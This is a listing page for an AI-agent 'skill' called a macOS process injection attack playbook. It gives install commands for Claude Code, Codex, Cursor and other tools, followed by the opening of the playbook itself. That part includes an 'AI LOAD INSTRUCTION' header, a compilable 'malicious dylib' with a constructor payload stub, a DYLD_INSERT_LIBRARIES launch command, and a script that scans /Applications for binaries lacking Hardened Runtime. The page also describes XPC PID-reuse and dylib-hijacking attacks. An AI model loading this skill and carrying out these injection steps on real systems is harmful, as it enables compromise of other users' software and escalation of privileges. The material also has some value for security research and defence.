## What it does

This skill guides agents through injecting code into macOS binaries and background processes. It includes shell recipes to scan `/Applications` using `codesign` and `defaults`, compile dual-architecture dylibs with `gcc`, and hijack dependencies via weak dylibs, `@rpath` search paths, or export proxying.

Another section covers finding privileged XPC services and exploiting PID reuse race conditions. It explains why PID checks fail while audit tokens and signature checks stop the attack.

Trying these techniques blindly is a waste of time, because System Integrity Protection and Hardened Runtime strip dynamic linker variables immediately. Preloading via `DYLD_INSERT_LIBRARIES` works only on unprotected binaries or targets explicitly signed with the `com.apple.security.cs.allow-dyld-environment-variables` entitlement.

## Requirements
- Works with: Chrome

## Install

### Claude Code (native platform)

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill macos-process-injection -a claude-code
```

2. **Manually: put the files in place**
- File: `~/.claude/skills/macos-process-injection/SKILL.md` — Copy the whole skill folder; for one project use .claude/skills/macos-process-injection/

### Codex

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill macos-process-injection -a codex
```

2. **Manually: put the files in place**
- File: `.agents/skills/macos-process-injection/SKILL.md` — For all projects use ~/.agents/skills/

### Cursor

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill macos-process-injection -a cursor
```

2. **Manually: put the files in place**
- File: `.cursor/skills/macos-process-injection/SKILL.md` — Cursor also reads .agents/skills/ and .claude/skills/

### GitHub Copilot

1. **GitHub CLI**
```bash
gh skill install yaklang/hack-skills macos-process-injection
```

2. **Manually: put the files in place**
- File: `.github/skills/macos-process-injection/SKILL.md`

### Gemini CLI

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill macos-process-injection -a gemini-cli
```

2. **Platform CLI**
```bash
gemini skills install https://github.com/yaklang/hack-skills --path skills/macos-process-injection
```

### Windsurf (Devin Desktop)

**Manually: put the files in place**
- File: `.devin/skills/macos-process-injection/SKILL.md` — The legacy .windsurf/skills/ path still works

### OpenCode

**Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill macos-process-injection -a opencode
```

### Claude.ai

**Claude.ai**
- Zip the folder and upload it in Settings → Capabilities → Skills

Where a file is given instead of a command, copy the files from the source to that path: https://github.com/yaklang/hack-skills/tree/HEAD/skills/macos-process-injection/SKILL.md

## When to use it
- find binaries without Hardened Runtime to test DYLD injection
- detect hijackable weak dylib references with `otool`
- compile a universal proxy dylib to intercept function exports
- audit XPC services for PID reuse race conditions

## Example prompts
- Check if /Applications/Target.app allows DYLD_INSERT_LIBRARIES injection.
- Show me how to identify missing weak dylibs using otool.
- Explain the steps to exploit an XPC service with PID reuse.

# SKILL: macOS Process Injection — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert macOS process injection techniques. Covers DYLD_INSERT_LIBRARIES, dylib hijacking (weak/rpath/proxy), XPC PID reuse attacks, Mach port manipulation, MIG abuse, and Electron injection. Base models miss entitlement prerequisites and SIP constraints on injection vectors.

## 1. DYLD_INSERT_LIBRARIES INJECTION

The most straightforward injection: set an environment variable that forces the dynamic linker to preload your dylib.

### 1.1 Requirements and Restrictions

| Condition | Can Inject? | Reason |
|---|---|---|
| Normal (non-hardened) binary | Yes | No restrictions |
| Hardened Runtime enabled | No | DYLD strips env vars |
| Hardened Runtime + `com.apple.security.cs.allow-dyld-environment-variables` | Yes | Entitlement explicitly allows it |
| Apple system binary (SIP-protected) | No | DYLD env vars stripped by SIP |
| SUID/SGID binary | No | DYLD env vars stripped for privilege safety |
| App Sandbox enabled | No | Sandbox blocks env var injection |

### 1.2 Basic Injection

```bash
# Create malicious dylib
cat > inject.c << 'EOF'
#include <stdio.h>
__attribute__((constructor))
void inject() {
    printf("[+] Injected into PID %d\n", getpid());
    // payload here
}
EOF
# Compile for both architectures
gcc -dynamiclib -o inject.dylib inject.c -arch x86_64 -arch arm64
# Inject into target
DYLD_INSERT_LIBRARIES=./inject.dylib /path/to/target
```

### 1.3 Finding Injectable Targets

```bash
# Find apps WITHOUT hardened runtime
find /Applications -name "*.app" -exec sh -c '
  binary=$(defaults read "$1/Contents/Info.plist" CFBundleExecutable 2>/dev/null)
  if [ -n "$binary" ]; then
    flags=$(codesign -d --verbose "$1/Contents/MacOS/$binary" 2>&1)
    echo "$flags" | grep -q "runtime" || echo "No Hardened Runtime: $1"
  fi
' _ {} \;
